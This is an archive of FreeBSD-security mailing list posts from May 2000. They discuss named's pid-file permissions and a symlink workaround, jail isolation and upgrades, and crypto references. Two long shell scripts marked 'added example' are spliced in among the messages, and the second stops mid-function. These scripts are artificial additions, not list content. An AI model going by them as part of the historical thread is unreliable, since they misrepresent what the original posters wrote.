doesn't need to re-write this file when it reloads, even though it tries and complains about not being able to because it has dropped privileges. However, at some time we (FreeBSD community) may wish to have a named setup where the we don't have to rely on named dropping its privileges; the better solution of course is to only start it with the proper privileges, and the low-port allocation bit will be handled by a proper capabilities/ACL setup. 
If we ever move to this setup, where named is started with the lowered permissions already, it will not be able to write out its pid file correctly. Hence, my suggestion is that the PID file for named be /var/run/named/named.pid. Having this be the location will solve two problems, the minor one of named complaining about not being able to write out its pid file when reloading, and the future-possibility problem if named is started with lowered privs, instead of having it drop privs. If we fix it now we don't have to worry about it later.

Note that we may wish to make this change for many of our daemons (I already put apache's runtime stuff in /var/run/apache/, even though it runs as root).

--
Frank Tobin
http://www.uiuc.edu/~ftobin/

"To learn what is good and what is to be valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus

From owner-freebsd-security Tue May 16 5:16:14 2000
From: Stuart Henderson
Date: Tue, 16 May 2000 13:16:06 +0100
To: Frank Tobin
Cc: FreeBSD-security Mailing List
Subject: Re: pid file for named

On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote:
> One often wishes to run daemons such as named
> under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a

For dns, surely djb's servers are a better choice where security is a priority?

From owner-freebsd-security Tue May 16 5:21:57 2000
From: User Datagram Protocol
Date: Tue, 16 May 2000 13:00:10 +0100
To: Frank Tobin
Subject: Re: pid file for named

On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote:
> One often wishes to run daemons such as named under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a
>
>     chmod -R bind:bind /etc/named
>
> However, the pid file, /var/run/named.pid, which named tries to write out
...

I agree, for pre-jail FreeBSD versions, but the use of a jail would make it a bit of a moot point, wouldn't it?

--
Bruce M. Simpson aka 'udp'
Security Analyst & UNIX Development Engineer
WWW: www.closed-networks.com/~udp  www.packetfactory.net/~udp
Dundee, United Kingdom
email: udp@closed-networks.com

From owner-freebsd-security Tue May 16 5:22:04 2000
From: User Datagram Protocol
Date: Tue, 16 May 2000 13:25:31 +0100
To: Stuart Henderson
Subject: Re: pid file for named

On Tue, May 16, 2000 at 01:16:06PM +0100, Stuart Henderson wrote:
> On Tue, May 16, 2000 at 06:48:05AM -0500, Frank Tobin wrote:
> > One often wishes to run daemons such as named under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a
>
> For dns, surely djb's servers are a better choice where security is a priority?

I have no firm figures, just subjective time perception, but a box running djb's dnscache seemed a heck of a lot slower than another box running regular BIND at doing reverse lookups...
The machines are both running 4.0-RELEASE and are of comparable spec.

--
Bruce M. Simpson aka 'udp'
Security Analyst & UNIX Development Engineer
WWW: www.closed-networks.com/~udp  www.packetfactory.net/~udp
Dundee, United Kingdom
email: udp@closed-networks.com

From owner-freebsd-security Tue May 16 5:22:47 2000
From: Mike Tancsa
Date: Tue, 16 May 2000 08:18:59 -0400
To: Frank Tobin, FreeBSD-security Mailing List
Subject: Re: pid file for named

At 06:48 AM 5/16/2000 -0500, Frank Tobin wrote:
> One often wishes to run daemons such as named under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a

Actually, just make a subdirectory (eg /etc/namedb/s) and chown it.
And in your options section of named.conf something like,

    directory "/etc/namedb";
    pid-file "/etc/namedb/s/named.pid";
    dump-file "s/named_dump.db";

---Mike

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications, www.sentex.net
Cambridge, Ontario Canada
www.sentex.net/mike

From owner-freebsd-security Tue May 16 6:29:33 2000
From: Andrew J Hayford
Date: Tue, 16 May 2000 09:29:27 -0400 (EDT)
To: freebsd-security@freebsd.org
Subject: Security Documentation

Greetings:

I've been running a freebsd box at home as a hobby for a while and just recently have been given the responsibility of admining a box at work. I've been reading the posts here for a while and have caught glimpses of several security measures (chroot etc) that I would like to implement. Can anyone suggest a good url, book, faq, etc that goes over good ideas for making a box as secure as possible?
Thanks in advance

Andrew Hayford

From owner-freebsd-security Tue May 16 6:35:39 2000
From: Jonas Eriksson
Date: Tue, 16 May 2000 15:35:22 +0200 (CEST)
To: Andrew J Hayford
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Security Documentation

> I've been running a freebsd box at home as a hobby for a while and just recently have been given the responsibility of admining a box at work. I've been reading the posts here for a while and have caught glimpses of several security measures (chroot etc) that I would like to implement. Can anyone suggest a good url, book, faq, etc that goes over good ideas for making a box as secure as possible?
>
> Thanks in advance
>
> Andrew Hayford

A good start is to read the Security Chapter in the FreeBSD handbook http://www.freebsd.org/handbook/security.html and your security(7) manpage.
Regards

--
Jonas Eriksson
je@sekure.net

From owner-freebsd-security Tue May 16 7:15:28 2000
From: Visigoth
Date: Tue, 16 May 2000 09:14:30 -0500 (CDT)
To: Kris Kennaway
Cc: freebsd-security@freebsd.org
Subject: Re: qpopper discussion on BUGTRAQ

Thanks for the info, that was all I was looking for. (No apologies needed for the backlog issue... I could live at work and would still be knee deep ;)

Thanks again

Visigoth

Damieon Stark
Sr. Unix Systems Administrator
visigoth@telemere.net
____________________________________________________________________________
| - M$ Win 2K was built for the internet.
| - Unix _BUILT_ the internet.
| FreeBSD - The POWER to serve
| http://www.freebsd.org your call...
----------------------------------------------------------------------------

From owner-freebsd-security Tue May 16 8:46:54 2000
From: Alfred Perlstein
Date: Tue, 16 May 2000 09:19:33 -0700
To: Frank Tobin
Cc: FreeBSD-security Mailing List
Subject: Re: pid file for named

* Frank Tobin [000516 05:22] wrote:
> However, the pid file, /var/run/named.pid, which named tries to write out one cannot give the proper permissions for, because it resides in a root-owned directory /var/run. Granted, named writes out this file before it drops privileges, and doesn't need to re-write this file when it reloads, even though it tries and complains about not being able to because it has dropped privileges.

Actually there's an evil trick one can use:

    # cd /var/run
    # mkdir named
    # touch named/named.pid
    # ln -s named/named.pid .
    # chown named:named named
    # rm named/named.pid

:)

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."
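Mike's named.conf fragment and Alfred's symlink layout, as one added example that is not code from the thread or from BIND: a shell function that reads the pid-file path out of named.conf (the lookup a control tool such as ndc would need), and a scratch-directory replay of the symlink trick with two simulated "named" write paths, open-and-truncate versus unlink-and-recreate. It assumes a POSIX sh with awk and mktemp, config paths without whitespace, and that the daemon's real write behaviour is approximated by those two paths rather than taken from named's source.

```shell
#!/bin/sh
# Added example, not code from the thread or from BIND. Part 1 reads the
# pid-file path out of named.conf (the lookup a control tool like ndc would
# need); part 2 replays Alfred's /var/run symlink layout in a scratch
# directory with two simulated "named" write paths. No root, no real named.

# Part 1: print the pid-file path from a named.conf ($1), or the default ($2)
# if none is set. Strips /* */, // and # comments, tracks brace depth so only
# the top-level "options" block counts, and resolves a relative pid-file
# against "directory" as named does. Assumes paths contain no whitespace.
named_pidfile() {
    awk -v dflt="$2" '
    {
        s = $0; line = ""
        while (s != "") {                   # strip comments; /* */ may span lines
            if (incomment) {
                p = index(s, "*/")
                if (p == 0) break
                s = substr(s, p + 2); incomment = 0; continue
            }
            a = index(s, "/*"); b = index(s, "//"); c = index(s, "#"); p = 0
            if (a) p = a
            if (b && (!p || b < p)) p = b
            if (c && (!p || c < p)) p = c
            if (!p) { line = line s; break }
            line = line substr(s, 1, p - 1)
            if (p == a) { incomment = 1; s = substr(s, p + 2) } else s = ""
        }
        gsub(/[{};]/, " & ", line)          # braces and ; become tokens
        n = split(line, tok)
        for (i = 1; i <= n; i++) {
            t = tok[i]
            if (t == "{") { depth++; if (depth == 1 && prev == "options") inopt = 1 }
            else if (t == "}") { if (depth == 1) inopt = 0; depth-- }
            else if (inopt && depth == 1 && i < n && (t == "pid-file" || t == "directory")) {
                v = tok[i + 1]; gsub(/"/, "", v)
                if (t == "pid-file") pidfile = v; else dir = v
            }
            prev = t
        }
    }
    END {
        if (pidfile == "") pidfile = dflt
        if (pidfile != "" && substr(pidfile, 1, 1) != "/" && dir != "") pidfile = dir "/" pidfile
        print pidfile
    }' "$1"
}

# Constructed named.conf modelled on the fragments in the thread; prints the
# path of the temporary file it wrote.
sample_named_conf() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
options {
    directory "/etc/namedb";
    /* pid-file "/var/run/named.pid";  the old location,
       commented out */
    pid-file "s/named.pid";   # relative, so resolved against "directory"
    dump-file "s/named_dump.db";
};
controls { unix "/var/run/ndc" perm 0600 owner 0 group 0; };
EOF
    printf '%s\n' "$f"
}

# Part 2: Alfred's layout under $1/run: a daemon-owned run/named/ and a
# symlink run/named.pid -> named/named.pid inside the root-owned run/.
setup_layout() { mkdir -p "$1/run/named" && ln -s named/named.pid "$1/run/named.pid"; }

# Write path A: open and truncate. open(2) follows the symlink, so the pid
# lands in run/named/named.pid and nothing in run/ itself changes.
write_pid_truncate() { printf '%s\n' "$2" > "$1/run/named.pid"; }

# Write path B: unlink, then recreate (what Frank saw named do). unlink(2)
# removes the entry in run/, i.e. the symlink, so it needs write permission on
# run/; and when it does succeed, a plain file replaces the link.
write_pid_unlink() { rm -f "$1/run/named.pid" && printf '%s\n' "$2" > "$1/run/named.pid"; }

# Run one write path ($1 = truncate|unlink) in a fresh scratch tree and report
# "<symlink|regular> <contents of run/named/named.pid, or none>".
run_strategy() {
    dir=$(mktemp -d); setup_layout "$dir"
    "write_pid_$1" "$dir" 4242
    if [ -L "$dir/run/named.pid" ]; then kind=symlink; else kind=regular; fi
    if [ -f "$dir/run/named/named.pid" ]; then inner=$(cat "$dir/run/named/named.pid"); else inner=none; fi
    rm -rf "$dir"; printf '%s %s\n' "$kind" "$inner"
}

# With run/ read-only, as /var/run is to the daemon user, the unlink path is
# refused while the truncate path still works. Root ignores mode bits, so the
# check prints "skipped" there.
unlink_refused_readonly() {
    if [ "$(id -u)" -eq 0 ]; then echo skipped; return 0; fi
    dir=$(mktemp -d); setup_layout "$dir"; chmod 555 "$dir/run"
    if ! write_pid_unlink "$dir" 4242 2>/dev/null && write_pid_truncate "$dir" 4242; then r=refused; else r=allowed; fi
    chmod 755 "$dir/run"; rm -rf "$dir"; echo "$r"
}
```

run_strategy truncate leaves the symlink in place with the pid in run/named/named.pid, while run_strategy unlink replaces the symlink with a plain file in run/ itself, which is exactly why the trick only helps a daemon that overwrites rather than unlinks.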
From owner-freebsd-security Tue May 16 9:58:44 2000
From: Kiril Mitev
Date: Tue, 16 May 2000 17:05:45 +0000 (GMT)
To: brett@lariat.org (Brett Glass)
Cc: bright@wintelcom.net, security@FreeBSD.ORG
Subject: GPL or not (was: Backend in Minivend)

> A better example, which shows the real danger, is as follows. Suppose that you run your e-commerce server on Debian Linux. Under Perens' proposed regime, you would be forced to give away (for free!) the code you used in your business because it was serving the public and running on a GPLed OS.
>
> Talk about a nasty land grab.
>
> --Brett

Just out of plain idle dumb curiosity - what about all those non-Linux OSes that are compiled with GCC?
(Oh, and mv to -chat, plz)

From owner-freebsd-security Tue May 16 10:05:27 2000
From: Robert Watson
Date: Tue, 16 May 2000 13:05:04 -0400 (EDT)
To: Geoffrey Robinson
Cc: security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?

On Mon, 15 May 2000, Geoffrey Robinson wrote:

> > ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000
>
> I'm planning to use jail in the near future to do two things. First is to generally increase the security of a system by putting services like http, smtp, ftp, etc. into separate jails to decrease the potential harm of a security hole. This system will only allow shell accesses to trusted individuals. The second plan is to create multiple, virtual servers on another host system. These virtual servers will allow shell access to semi-trusted individuals, including the jail root user. Also the jail administrator could potentially run unsecure services. This second plan is tentative depending on the reliability of jail.
>
> I have setup a test jail on my workstation with good results. The first problem I have found is that I can't access the jailed IP at all from the host system, nor the host system from the jailed one.
> However both host and jailed IPs are accessible to other machines on the network. Is this intentional? The jailed system can access the Internet fine through my natd setup on the host system (which actually surprised me). I'm

It sounds like a configuration error. Jail merely limits the scope of bindable addresses; it shouldn't limit connectivity between them unless that limit existed without the jail present. Check that you're aliasing the IPs properly -- specifically, that you're adding IP aliases with a netmask of 255.255.255.255.

> aware that raw sockets are not allowed to jailed processes but is there a workaround for ping and traceroute?

Currently, no. Due to the way raw sockets work (allowing listening for all non-handled IP messages, and allowing direct writing of IP packets), it would take a bit of work to get this up and running, although it would be feasible. A more promising long-term goal might be to better virtualize network services, creating virtual interfaces and binding real network resources to virtual interfaces. However, that would be far more work. :-)

> Finally how secure is jail really? I'm aware of a trivial chroot breakout technique. Does that hole still exist? Are there any other known holes? Is jail still under active development? Is it worth the trouble to do any of this?

As far as I know, none of the chroot() breakout mechanisms will work from jail(), as long as the jail() file system is constructed and maintained in a safe manner. For example, jail() prevents new device nodes from being introduced with mknod(). However, this assumes that (a) no improper device nodes existed in the accessible file space in the first place, and (b) root outside of jail() won't create them in the file space.

Jail is being actively maintained; I have some ideas for it in the long term, but probably won't get to carrying them to fruition for a few months.
This includes improved management capability (unique jailids, ability to deliver a signal to an entire jail from outside the jail, as well as special purpose binaries such as a jailinit to manage setup and shutdown of jails in an orderly manner). If you are interested in working on such features, I'd be glad to share design thoughts with you, as it will take me a while to get to this stuff. Right now my efforts are primarily aimed at improving the security abstractions within the kernel relating to the TrustedBSD project--this should have a side benefit of improving the relationship between jail() and the base OS, making Jail easier to maintain and modify.

Robert N M Watson
robert@fledge.watson.org
http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Tue May 16 10:51:09 2000
From: dima@rdy.com (Dima Ruban)
Date: Tue, 16 May 2000 10:50:09 -0700 (PDT)
To: Frank Tobin
Cc: FreeBSD-security Mailing List
Subject: Re: pid file for named

Frank Tobin writes:
> One often wishes to run daemons such as named
> under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a
>
>     chmod -R bind:bind /etc/named
>
> However, the pid file, /var/run/named.pid, which named tries to write out

You can set it in named.conf:

    options {
        ...
        pid-file "/etc/namedb/run/named.pid";
        ...
    };

However, this will break "ndc", since it's looking for /var/run/named.pid instead of extracting current "pid-file" value from the named.conf.

-- dima

From owner-freebsd-security Tue May 16 11:15:50 2000
From: Frank Tobin
Date: Tue, 16 May 2000 13:15:28 -0500 (CDT)
To: Alfred Perlstein
Cc: FreeBSD-security Mailing List
Subject: Re: pid file for named

Alfred Perlstein, at 09:19 -0700 on Tue, 16 May 2000, wrote:
> # cd /var/run
> # mkdir named
> # touch named/named.pid
> # ln -s named/named.pid .
> # chown named:named named
> # rm named/named.pid

Actually, named still complains about this, because I think it tries to actually unlink /var/run/named.pid; it doesn't seem to just want to overwrite it.

--
Frank Tobin
http://www.uiuc.edu/~ftobin/

"To learn what is good and what is to be valued, those truths which cannot be shaken or changed."
Myst: The Book of Atrus

From owner-freebsd-security Tue May 16 11:22:49 2000
From: Feisal Mohammed
Date: Tue, 16 May 2000 14:24:09 -0400
To: FreeBSD-security Mailing List
Subject: Re: pid file for named

Dima Ruban wrote:
>
> Frank Tobin writes:
> > One often wishes to run daemons such as named under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a
> >
> >     chmod -R bind:bind /etc/named
> >
> > However, the pid file, /var/run/named.pid, which named tries to write out
>
> You can set it in named.conf:
>
>     options {
>         ...
>         pid-file "/etc/namedb/run/named.pid";
>         ...
>     };
>
> However, this will break "ndc", since it's looking for /var/run/named.pid instead of extracting current "pid-file" value from the named.conf.
>
> -- dima
>

That can be fixed as follows; I have two named running, one on the inside interface and the other on the outside interface.

-Feisal

    /* inside interface */
    options {
        directory "/etc/namedb";
        listen-on { x.in.si.de; };
        forwarders { x.in.si.de; };
        pid-file "/var/run/named-inside.pid";
    };

    controls {
        unix "/var/run/ndc-inside" perm 0600 owner xxx group xxx;
    };

From owner-freebsd-security Tue May 16 11:46:00 2000
From: dima@rdy.com (Dima Ruban)
Date: Tue, 16 May 2000 11:44:53 -0700 (PDT)
To: Feisal Mohammed
Cc: FreeBSD-security Mailing List
Subject: Re: pid file for named

Feisal Mohammed writes:
> Dima Ruban wrote:
> >
> > Frank Tobin writes:
> > > One often wishes to run daemons such as named under other users, e.g., bind:bind.
> > > In order to allow bind to write out zones and associated fun stuff correctly, one then does a
> > >
> > >     chmod -R bind:bind /etc/named
> > >
> > > However, the pid file, /var/run/named.pid, which named tries to write out
> >
> > You can set it in named.conf:
> >
> >     options {
> >         ...
> >         pid-file "/etc/namedb/run/named.pid";
> >         ...
> >     };
> >
> > However, this will break "ndc", since it's looking for /var/run/named.pid instead of extracting current "pid-file" value from the named.conf.
> >
> > -- dima
> >
>
> That can be fixed as follows; I have two named running, one on the inside interface and the other on the outside interface.

It doesn't do much good, since you still have to type:

    ndc -c /var/run/ndc-inside whatever_command_you_want

What I meant is that ndc should have simple parsing capabilities to extract most of the information it needs from named.conf.

>
> -Feisal
>

-- dima

From owner-freebsd-security Tue May 16 12:30:26 2000
From: Kris Kennaway
Date: Tue, 16 May 2000 12:30:24 -0700 (PDT)
To: Jonas Eriksson
Cc: sen_ml@eccosys.com, security@FreeBSD.ORG
Subject: Re: SSH1, SSH2, RSA, DES, etc etc

On Tue, 16 May 2000, Jonas Eriksson wrote:

> OpenSSH has support for SSH1 and SSH2
>
> http://www.OpenSSH.com/

Also in 5.0-CURRENT, soon to be coming to a 4.0-STABLE near you.

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue May 16 14:00:18 2000
From: Geoffrey Robinson
Date: Tue, 16 May 2000 17:02:20 -0400 (EDT)
To: Robert Watson
Cc: security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?

On Tue, 16 May 2000, Robert Watson wrote:

> On Mon, 15 May 2000, Geoffrey Robinson wrote:
> >
> > > ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000
> >
> > aware that raw sockets are not allowed to jailed processes but is there a workaround for ping and traceroute?
>
> Currently, no. Due to the way raw sockets work (allowing listening for all non-handled IP messages, and allowing direct writing of IP packets), it would take a bit of work to get this up and running, although it would be feasible. A more promising long-term goal might be to better virtualize network services, creating virtual interfaces and binding real network resources to virtual interfaces. However, that would be far more work.
> :-)

If a process running in the host system created a UNIX domain socket or named pipe within the jail directory tree, would a process running in the jail be able to connect to and communicate with the host process through this socket or pipe? If so I guess you could create a workaround for just about anything by running it on the host system. Would this create a potential way of defeating the jail?

> As far as I know, none of the chroot() breakout mechanisms will work from jail(), as long as the jail() file system is constructed and maintained in a safe manner. For example, jail() prevents new device nodes from being introduced with mknod(). However, this assumes that (a) no improper device nodes existed in the accessible file space in the first place, and (b) root outside of jail() won't create them in the file space.

What about upgrading procedures? After my last cvsup and make world on the host system the jail could be started but could not access the network. I had to build a new jail from scratch to get it working properly.

> Jail is being actively maintained; I have some ideas for it in the long term, but probably won't get to carrying them to fruition for a few months. This includes improved management capability (unique jailids, ability to deliver a signal to an entire jail from outside the jail, as well as special purpose binaries such as a jailinit to manage setup and shutdown of jails in an orderly manner). If you are interested in working on such features, I'd be glad to share design thoughts with you, as it will take me a while to get to this stuff.

I would like to try. I don't know how much help I could be. Please, let me know what I can do. I'll do what I can.
------------------------------------------------------------------------------ | Geoffrey Robinson - geoff@grobin.org | ------------------------------------------------------------------------------ Random Fortune Quote "MacDonald has the gift on compressing the largest amount of words into the smallest amount of thoughts." -- Winston Churchill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 19:54:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from exchange.lightrealm.com (exchange.lightrealm.com [216.122.95.4]) by hub.freebsd.org (Postfix) with ESMTP id 90F9137B538 for ; Tue, 16 May 2000 19:54:46 -0700 (PDT) (envelope-from rcarskadden@lightrealm.com) Received: by EXCHANGE with Internet Mail Service (5.5.2650.21) id ; Tue, 16 May 2000 19:57:13 -0700 Message-ID: From: Rush Carskadden To: "'security@freebsd.org'" Subject: RE: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 19:57:13 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Those concerned about crypto - The Handbook of Applied Cryptography can be found here: http://cacr.math.uwaterloo.ca/hac/ Also, if you are looking for a good guide to various cryptographic technologies, I recommend the ICSA Guide to Cryptography (ISBN 0079137598). Applied Cryptography is THE book to own, but the ICSA has a good algo-by-algo breakdown. 
I might also recommend checking out the following links: Ritter's Crypto Glossary and Dictionary of Technical Cryptography - for those sometimes nasty terms - http://www.io.com/~ritter/GLOSSARY.HTM Cypherpunk HyperArchive - an extensive archive of the Cypherpunks mailing list, a list devoted to yapping about cryptography (most of the time) http://www.inet-one.com/cypherpunks/ If that isn't enough to get you started, send me an email, and I will hook you up with the motherload of crypto references. ok, Rush Carskadden -----Original Message----- From: sen_ml@eccosys.com [mailto:sen_ml@eccosys.com] Sent: Tuesday, May 16, 2000 12:31 AM To: security@FreeBSD.ORG Subject: Re: SSH1, SSH2, RSA, DES, etc etc From: "Morten Seeberg" Subject: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 09:13:01 +0200 Message-ID: <00bf01bfbf06$2d28f0b0$deff58c1@sos> > Does anyone know a good link to an explanation of these? not off-hand -- for crypto stuff, the book "applied cryptography 2nd ed" has pretty good descriptions of various algorithms. the handbook of applied cryptography is available via http or ftp as well, but i haven't read that myself. perhaps someone can provide a link. 
<--snip--> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 6:47: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from jello.geekspace.com (jello.geekspace.com [208.154.207.134]) by hub.freebsd.org (Postfix) with SMTP id AB4B037BA47 for ; Wed, 17 May 2000 06:46:51 -0700 (PDT) (envelope-from chris.williams@third-rail.net) Received: (qmail 11014 invoked from network); 17 May 2000 13:47:15 -0000 Received: from jenica2.cust.third-rail.net (HELO third-rail.net) (@208.154.207.102) by jello.geekspace.com with SMTP; 17 May 2000 13:47:15 -0000 Message-ID: <3922A204.1A9CECCD@third-rail.net> Date: Wed, 17 May 2000 09:43:32 -0400 From: Chris Williams X-Mailer: Mozilla 4.72 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If a process running in the host system created a UNIX domain socket or > named pipe within the jail directory tree. Would a process running in the > jail be able to connect to and communicate with the host process through > this socket or pipe? If so I guess you could create work around for just > about anything by running it on the host system. Would this create a > potential way of defeating the jail? It does bring up the issue of buffer overflows and soforth in the process on the unjailed end of the pipe. 
From owner-freebsd-security Wed May 17 08:05:22 2000
Date: Wed, 17 May 2000 11:05:07 -0400 (EDT)
From: Robert Watson
To: Geoffrey Robinson
Cc: security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?

On Tue, 16 May 2000, Geoffrey Robinson wrote:

> On Tue, 16 May 2000, Robert Watson wrote:
>
> > On Mon, 15 May 2000, Geoffrey Robinson wrote:
> >
> > >
> > > ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000
> > > aware that raw sockets are not allowed to jailed processes but is there
> > > a workaround for ping and traceroute?
> >
> > Currently, no. Due to the way raw sockets work (allowing listening for
> > all non-handled IP messages, and allowing direct writing of IP packets),
> > it would take a bit of work to get this up and running, although it would
> > be feasible. A more promising long-term goal might be to better
> > virtualize network services, creating virtual interfaces and binding real
> > network resources to virtual interfaces. However, that would be far more
> > work. :-)
>
> If a process running in the host system created a UNIX domain socket or
> named pipe within the jail directory tree. Would a process running in the
> jail be able to connect to and communicate with the host process through
> this socket or pipe? If so I guess you could create work around for just
> about anything by running it on the host system. Would this create a
> potential way of defeating the jail?

Jail works by:

1) Chrooting the child process
2) Limiting the scope of superuser privileges accessible by uid0 processes
   in the jail

It does not attempt to prevent processes outside the jail from
communicating with processes within the jail. As such, having a process do
so wouldn't defeat the jail per se, but would defeat the purpose of the
jail :-).

> > As far as I know, none of the chroot() breakout mechanisms will work from
> > jail(), as long as the jail() file system is constructed and maintained in
> > a safe manner. For example, jail() prevents new device nodes from being
> > introduced with mknod(). However, this assumes that (a) no improper
> > device nodes existed in the accessible file space in the first place, and
> > (b) root outside of jail() won't create them in the file space.
>
> What about upgrading procedures? After my last cvsup and make world
> on the host system the jail could be started but could not access the
> network. I had to build a new jail from scratch to get it working properly.

I'm not clear on why that would happen -- the libc (etc, etc) in each jail
should be kept in synch with the kernel, however, and that could be the
source of your problems. I.e., if you upgrade the kernel, it exports the
same syscall interface to all processes, regardless of jails, so all jails
making use of syscalls that have changed need to be upgraded in synch. This
is the same as upgrading the kernel without upgrading your normal world.

One way to substantially improve jail scalability would be to allow the
same (read-only) file system to be present in all jails as the root, with
only jail-local data being modified. You can imagine gratuitously using
nullfs (if it worked) to do this, and mount per-jail writable fs's for
appropriate subdirectories (/etc, /usr/local, /home) with appropriate
symlinks within the jail. Right now, each jail costs you the size of world,
and is hard to upgrade if you have any decent number of jails. Storing all
that stuff in a single tree mapped read-only into jails would solve that
(you'd probably want two so you could upgrade one, test it, and then swap
to that for all jails so as to minimize downtime).

> > Jail is being actively maintained; I have some ideas for it in the long
> > term, but probably won't get to carrying them to fruition for a few
> > months. This includes improved management capability (unique jailids,
> > ability to deliver a signal to an entire jail from outside the jail, as
> > well as special purpose binaries such as a jailinit to manage setup and
> > shutdown of jails in an orderly manner. If you are interested in working
> > on such features, I'd be glad to share design thoughts with you, as it
> > will take me a while to get to this stuff.
>
> I would like to try. I don't know how much help I could be. Please, let me
> know what I can do. I'll do what I can.

I'll gather up my notes on possible improvements and post them to -security
sometime in the next week or two. Thanks!

Robert N M Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services


From owner-freebsd-security Wed May 17 09:08:13 2000
Date: Wed, 17 May 2000 11:07:58 -0500
From: "Jacques A . Vidrine"
To: Robert Watson
Cc: Geoffrey Robinson, security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?

On Wed, May 17, 2000 at 11:05:07AM -0400, Robert Watson wrote:
> Jail works by:
>
> 1) Chrooting the child process
> 2) Limiting the scope of superuser privileges accessible by uid0 processes
>    in the jail

3) Limiting network access to a single IP address

[snip]

> Right now, each jail costs you the size of
> world, and is hard to upgrade if you have any decent number of jails.

You don't need the whole world depending on what you are doing.
If a jail is set up for the purposes of a single application (which I expect
is the most common scenario), you only need the files that support it.

Upgrading the jail is simple if you created a script to create the jail in
the first place -- you re-run the script after upgrading the base system.

For me the real problem with this scheme is producing the script for
building a jail in the first place. I do it by hand. One of these days I'd
like to try writing an application that can generate a first-draft script
for building a jail, given a list of applications that need to run in the
jail. I think it might be nifty to do this based on the output of a ktrace
on the target applications during a test run.

> Storing all that stuff in a single tree mapped read-only into jails would
> solve that (you'd probably want two so you could upgrade one, test it, and
> then swap to that for all jails so as to minimize downtime).

I don't think you want this unless the purpose of your jail is to provide a
`complete virtual server' for shell access et al. I don't want e.g. `cc' or
`sync' or most of the things in `/dev' to be available to a jailed process.

> I'll gather up my notes on possible improvements and post them to
> -security sometime in the next week or two. Thanks!

Yay, thanks Robert!
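The ktrace-driven approach Jacques sketches above, as an added example that is neither his script nor anything from the FreeBSD tree: a POSIX sh script that pulls the pathnames out of a kdump(1) transcript of a test run and emits a first-draft jail-building script. It assumes the FreeBSD 4-era kdump line layout (pid, command, record type, then a quoted path for NAMI records), paths without whitespace, and that a NAMI whose following RET carries an errno was a failed probe the program can live without; the function names, the /jail/sshd path and the trace lines are made up for the example.

```shell
#!/bin/sh
# Added example (not from the list thread): turn a kdump(1) transcript of a
# test run into a first-draft script for populating a jail.

# Constructed sample of kdump output, in the FreeBSD 4 layout assumed here:
# pid, command, record type, then the record payload. Not a real trace.
SAMPLE_KDUMP='  1234 sshd     CALL  open(0x8001234,0,0)
  1234 sshd     NAMI  "/etc/ssh/sshd_config"
  1234 sshd     RET   open 3
  1234 sshd     CALL  open(0x8001240,0,0)
  1234 sshd     NAMI  "/usr/lib/libcrypto.so.1"
  1234 sshd     RET   open -1 errno 2 No such file or directory
  1234 sshd     CALL  open(0x8001240,0,0)
  1234 sshd     NAMI  "/lib/libc.so.4"
  1234 sshd     RET   open 4
  1234 sshd     CALL  stat(0x8001250,0xbfbff000)
  1234 sshd     NAMI  "/lib/libc.so.4"
  1234 sshd     RET   stat 0
  1234 sshd     CALL  open(0x8001260,0x1,0)
  1234 sshd     NAMI  "/dev/null"
  1234 sshd     RET   open 5
  1234 sshd     CALL  open(0x8001270,0,0)
  1234 sshd     NAMI  "relative/file"
  1234 sshd     RET   open 6'

# kdump_paths: read kdump output on stdin, print the unique absolute paths
# looked up by syscalls that succeeded. NAMI records are buffered until the
# matching RET; a RET carrying "errno" discards them, so the failed probes
# ld.so makes along its library search path do not end up in the jail.
# Relative lookups are skipped: they depend on the cwd of the traced run.
kdump_paths() {
    awk '
        $3 == "CALL" { n = 0 }
        $3 == "NAMI" { p = $4; gsub(/"/, "", p); if (p ~ /^\//) pend[n++] = p }
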